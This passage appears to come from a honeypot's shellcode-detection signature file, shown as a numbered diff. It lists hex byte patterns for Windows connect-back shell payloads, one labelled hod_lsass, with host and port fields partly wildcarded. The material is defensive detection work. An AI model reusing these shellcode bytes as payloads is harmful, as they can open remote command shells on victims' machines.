	685	"\\x8D\\x5F\\x3C\\x8B\\x1B\\x01\\xFB\\x8B\\x5B\\x78\\x01\\xFB\\x8B\\x4B\\x1C\\x01"
	686	"\\xF9\\x8B\\x53\\x24\\x01\\xFA\\x53\\x51\\x52\\x8B\\x5B\\x20\\x01\\xFB\\x31\\xC9"
	687	"\\x41\\x31\\xC0\\x99\\x8B\\x34\\x8B\\x01\\xFE\\xAC\\x31\\xC2\\xD1\\xE2\\x84\\xC0"
	688	"\\x75\\xF7\\x0F\\xB6\\x45\\x09\\x8D\\x44\\x45\\x08\\x66\\x39\\x10\\x75\\xE1\\x66"
	689	"\\x31\\x10\\x5A\\x58\\x5E\\x56\\x50\\x52\\x2B\\x4E\\x10\\x41\\x0F\\xB7\\x0C\\x4A"
	690	"\\x8B\\x04\\x88\\x01\\xF8\\x0F\\xB6\\x4D\\x09\\x89\\x44\\x8D\\xD8\\xFE\\x4D\\x09"
	691	"\\x75\\xBE\\xFE\\x4D\\x08\\x74\\x17\\xFE\\x4D\\x24\\x8D\\x5D\\x1A\\x53\\xFF\\xD0"
	692	"\\x89\\xC7\\x6A\\x02\\x58\\x88\\x45\\x09\\x80\\x45\\x79\\x0C\\xEB\\x82\\x50\\x8B"
	693	"\\x45\\x04\\x35(....)\\x89\\x45\\x04\\x66\\x8B\\x45\\x02\\x66\\x35"
	694	"(..)\\x66\\x89\\x45\\x02\\x58\\x89\\xCE\\x31\\xDB\\x53\\x53\\x53\\x53\\x56"
	695	"\\x46\\x56\\xFF\\xD0\\x89\\xC7\\x55\\x58\\x66\\x89\\x30\\x6A\\x10\\x55\\x57\\xFF"
	696	"\\x55\\xE0\\x8D\\x45\\x88\\x50\\xFF\\x55\\xE8\\x55\\x55\\xFF\\x55\\xEC\\x8D\\x44"
	697	"\\x05\\x0C\\x94\\x53\\x68\\x2E\\x65\\x78\\x65\\x68\\x5C\\x63\\x6D\\x64\\x94\\x31"
	698	"\\xD2\\x8D\\x45\\xCC\\x94\\x57\\x57\\x57\\x53\\x53\\xFE\\xCA\\x01\\xF2\\x52\\x94"
	699	"\\x8D\\x45\\x78\\x50\\x8D\\x45\\x88\\x50\\xB1\\x08\\x53\\x53\\x6A\\x10\\xFE\\xCE"
	700	"\\x52\\x53\\x53\\x53\\x55\\xFF\\x55\\xF0\\x6A\\xFF\\xFF\\x55\\xE4";
	701	mapping (none,port,host,hostkey,portkey);
	702	};
	703
	704
	705	connectbackshell::hod_lsass
	706	{
	707
	708	pattern
	709	"\\xE9\\xFB\\x00\\x00\\x00\\x5F\\x64\\xA1\\x30"
	710	"\\x00\\x00\\x00\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x68\\x08\\x8B\\xF7\\x6A"
	711	"\\x04\\x59\\xE8\\x9B\\x00\\x00\\x00\\xE2\\xF9\\x68\\x33\\x32\\x00\\x00\\x68\\x77"
	712	"\\x73\\x32\\x5F\\x54\\xFF\\x16\\x8B\\xE8\\x6A\\x04\\x59\\xE8\\x82\\x00\\x00\\x00"
	713	"\\xE2\\xF9\\x81\\xEC\\x90\\x01\\x00\\x00\\x54\\x68\\x01\\x01\\x00\\x00\\xFF\\x56"
	714	"\\x10\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF\\x56\\x14\\x8B\\xD8\\x68(."
	715	"...)\\x68\\x02\\x00(..)\\x8B\\xCC\\x6A\\x10\\x51\\x53\\xFF\\x56"
	716	"\\x18\\x85\\xC0\\x75\\x4A\\x68\\x63\\x6D\\x64\\x00\\x89\\x66\\x30\\x83\\xEC\\x54"
	717	"\\x8D\\x3C\\x24\\x6A\\x15\\x59\\xAB\\xE2\\xFD\\xC6\\x44\\x24\\x10\\x44\\xFE\\x44"
	718	"\\x24\\x3D\\x89\\x5C\\x24\\x48\\x89\\x5C\\x24\\x4C\\x89\\x5C\\x24\\x50\\x8D\\x44"
	719	"\\x24\\x10\\x54\\x50\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\xFF\\x76\\x30\\x51\\xFF"
	720	"\\x56\\x04\\x8B\\xCC\\x6A\\xFF\\xFF\\x31\\xFF\\x56\\x08\\x53\\xFF\\x56\\x1C\\xFF"
	721	"\\x56\\x0C\\x51\\x56\\x8B\\x45\\x3C\\x8B\\x54\\x28\\x78\\x03\\xD5\\x52\\x8B\\x72"
	722	"\\x20\\x03\\xF5\\x33\\xC9\\x49\\x41\\xAD\\x03\\xC5\\x33\\xDB\\x0F\\xBE\\x10\\x3A"
	723	"\\xD6\\x74\\x08\\xC1\\xCB\\x0D\\x03\\xDA\\x40\\xEB\\xF1\\x3B\\x1F\\x75\\xE7\\x5A"
	724	"\\x8B\\x5A\\x24\\x03\\xDD\\x66\\x8B\\x0C\\x4B\\x8B\\x5A\\x1C\\x03\\xDD\\x8B\\x04"
	725	"\\x8B\\x03\\xC5\\xAB\\x5E\\x59\\xC3\\xE8\\x00\\xFF\\xFF\\xFF\\x8E\\x4E\\x0E\\xEC"
	726	"\\x72\\xFE\\xB3\\x16\\xAD\\xD9\\x05\\xCE\\xEF\\xCE\\xE0\\x60\\xCB\\xED\\xFC\\x3B"
	727	"\\xD9\\x09\\xF5\\xAD\\xEC\\xF9\\xAA\\x60\\xE7\\x79\\xC6\\x79";
	728	mapping (none,host,port);
	729	};
	730
510	731
511	732	connectbackfiletransfer::halle
…	…
526	747
527	748
	749
	750
	751
528	752	// taken from shellcode-generic/sch_generic_cmd.cpp
529	753	execute::cmd